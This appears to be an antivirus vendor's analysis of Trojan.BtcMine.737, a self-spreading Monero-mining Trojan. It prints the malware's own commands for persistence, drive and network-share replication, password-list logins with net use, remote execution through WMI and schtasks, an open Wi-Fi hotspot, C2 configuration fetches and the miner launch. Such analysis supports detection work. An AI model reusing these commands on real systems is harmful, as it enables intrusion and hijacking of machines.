SHA1:
cc1e71c0e65280c9a32699e2850fafba19218fa0 (dropper)
edd53c0995a37618ffdb84557c8d737ae1ff5cc6 (worm)
f6ab05d457dab97767e5112ac4cc6e4998345afa (miner)
A Trojan designed for mining electronic currency. It consists of three installers nested in each other and created by means of Nullsoft Scriptable Install System (NSIS).
The first installer is a simple dropper that tries to kill the following running processes belonging to the Trojan:
cmd /c taskkill /f /im file0.exe & tskill file0.exe
cmd /c taskkill /f /im CNminer.exe & tskill CNminer.exe
cmd /c taskkill /f /im minerd.exe & tskill minerd.exe
cmd /c taskkill /f /im cgminer.exe & tskill cgminer.exe
cmd /c taskkill /f /im key.exe & tskill key.exe
Then it replicates itself to the hard drive of the compromised computer and runs the created copies.
%TEMP%\Key.exe
After that, the dropper attempts to delete the original file.
cmd /c for %i in (1,1,900) do del "<full path to the dropper>"
The second installer (key.exe) saves the executable with the CNminer.exe name to the following folder and then runs it:
%APPDATA%\NsCpuCNMiner\
Then it replicates itself to %APPDATA%\%USERNAME% by executing the following command:
cmd /c xcopy /y <own name> %COMMON_STARTUP% & xcopy /y /i <own name> %APPDATA%\%USERNAME%
and makes the folder accessible from the local network.
net share %USERNAME%="$APPDATA\%USERNAME%" /unlimited /cache:programs
After that, the second installer copies itself to the Documents folder:
"cmd" /c xcopy /y "$EXEPATH" "C:\Documents and Settings\All Users\Документы\" &
xcopy /y /i "$EXEPATH" "C:\Documents and Settings\All users\Documents\"
Then the Trojan replicates itself to root folders of all hard drives (this operation is repeated periodically) as follows:
cmd /c for %i in (A B C D E F G H J K L M N O P R S T Q U Y I X V X W Z)
do xcopy /y "%Temp%\key.exe" %i:\
These copies look as WinRAR archives with the Key name.
Once launched, the Trojan goes through all computers in network places as follows:
"cmd" /c taskkill /f /im net.exe & tskill net.exe & net view
trying to connect to them by using logins and passwords from a special list.
"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use
"\\NETCOMP-PC" "passwordpassword" /user:"NETCOMP" & net view "\\NETCOMP-PC" &
net use "\\NETCOMP-PC" /delete /y
"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use
"\\NETCOMP-PC" "P@ssw0rd" /user:"NETCOMP" & net view "\\NETCOMP-PC" &
net use "\\NETCOMP-PC" /delete /y
"cmd" /c taskkill /f /im net.exe & tskill net.exe & net use
"\\NETCOMP-PC" "flvbybcnhfnjh" /user:"NETCOMP" & net view "\\NETCOMP-PC" &
net use "\\NETCOMP-PC" /delete /y
...
Moreover, the malicious program tries to crack the password to the Windows user account. If such an attempt is successful and if necessary equipment is available, Trojan.BtcMine.737 sets up an open Wi-Fi access point as follows:
cmd /c taskkill /f /im schtasks.exe &
tskill schtasks.exe &
SchTasks /Create /TN WiFi /F /TR "cmd /c netsh wlan set hostednetwork mode=allow
ssid=FREE_WIFI_abc12345 key=abc12345 keyUsage=persistent && netsh wlan start hostednetwork &
net share %USERNAME%=C:\Users\%USERNAME%\AppData\Roaming\%USERNAME% /unlimited
/cache:programs" /RU "%USERNAME%" /RP "passwordpassword" /SC ONCE /ST 01:00:00 &&
SchTasks /Run /TN WiFi /i
If a connection to any computer on the network is established, the Trojan tries to replicate itself to that computer and run the copy using Windows Management Instrumentation (WMI)
StrCpy $R7 "/node:"$R1" /user:$R2 /password:$R3"
Push "cmd" /c wmic $R7 process where name="$EXEFILE" | find /i "$EXEFILE" ||
(wmic $R7 process call create "C:$R5\$EXEFILE" & wmic $R7 process call create "$R6\$EXEFILE")
or using Task Scheduler as follows:
Push "cmd" /c schtasks /create /s "$R1" /u $R2 /p $R3 /ru system /tn "Key"
/tr "C:$R5\$EXEFILE" /sc onlogon /f
Once launched on the infected computer, CNminer.exe saves the miner's executable files (NsCpuCNMiner32.exe, NsCpuCNMiner64.exe, and pools.txt) to the folder from where it is started. To ensure autorun of an executable, the Trojan modifies the relevant Windows system registry branch creating a corresponding shortcut in the standard autorun folder as follows:
WriteRegStr HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "CNminer"
"$APPDATA\NsCpuCNMiner\CNminer.exe"
CreateShortCut "$COMMON_STARTUP\CNminer.lnk" "$APPDATA\NsCpuCNMiner\CNminer.exe"
0 465 108462336
After the installer is run, the script contained in it kills the following running processes belonging to the miners (if they are launched):
cmd.exe /c taskkill /f /im minerd.exe & tskill minerd.exe
cmd.exe /c taskkill /f /im NsCpuCNMiner32.exe & tskill NsCpuCNMiner32.exe
cmd.exe /c taskkill /f /im NsCpuCNMiner64.exe & tskill NsCpuCNMiner64.exe
Then the Trojan connects to the command and control server and receives additional configuration data in HTML format. The data contains pool properties and electronic wallet identifiers which constantly change.
StrCpy $[38] "[,.:?&%=@!1234567890/qwertyuiopasdfghjklzxcvbnm "
StrCpy $[39] " mnbvcxzlkjhgfdsapoiuytrewq/0987654321!@=%&?:.,["
StrCpy $[33]
"st******t.ru,178.**.***.223,pr******t.ru,te*****y.ru,p*****s.ru,qp****t.ru,pr*****s.ru"
StrCpy $[34] "stratum+tcp://mine.moneropool.com:8080 -t 0"
StrCpy $[35]
"43qgfne1Bi2UUvffo815n3DfGmMW6ZRmagc2aCagW9wdY7QDvL1qCw1LD6FCro9kk42e86bxxRbbnSk3mUfaW2nCDbZgA
Bp"
...
Push kernel32::GetTickCount()i.r2
StrCpy $[32] "http://$[32]/test.html?$2"
...
Push $[32]
Push /TOSTACK
Push Mozilla/5.0 Gecko/20100101 Firefox/4.0
Push /USERAGENT
RegisterDLL $PLUGINSDIR\inetc.dll get 0
Sleep 942
After that, the miner itself is launched:
"C:\Users\<username>\AppData\Roaming\NsCpuCNMiner\NsCpuCNMiner32.exe" -dbg -1
-o stratum+tcp://mine.moneropool.com:3333 -t 0 -u
43tjagd2e8d4GXzYn5xmysYmDnLbvvZSHFPbMWtg4Cs1DLwztfENYbNBz8Y8fmuhpCXFHDzXUWn2QZwhswsNtgzTM8v899
K -p x
It should be noted that cybercriminals use a different tool for electronic currency mining. This tool is created by another developer and is detected by Dr.Web as a program belonging to the Tool.BtcMine family.
News about the Trojan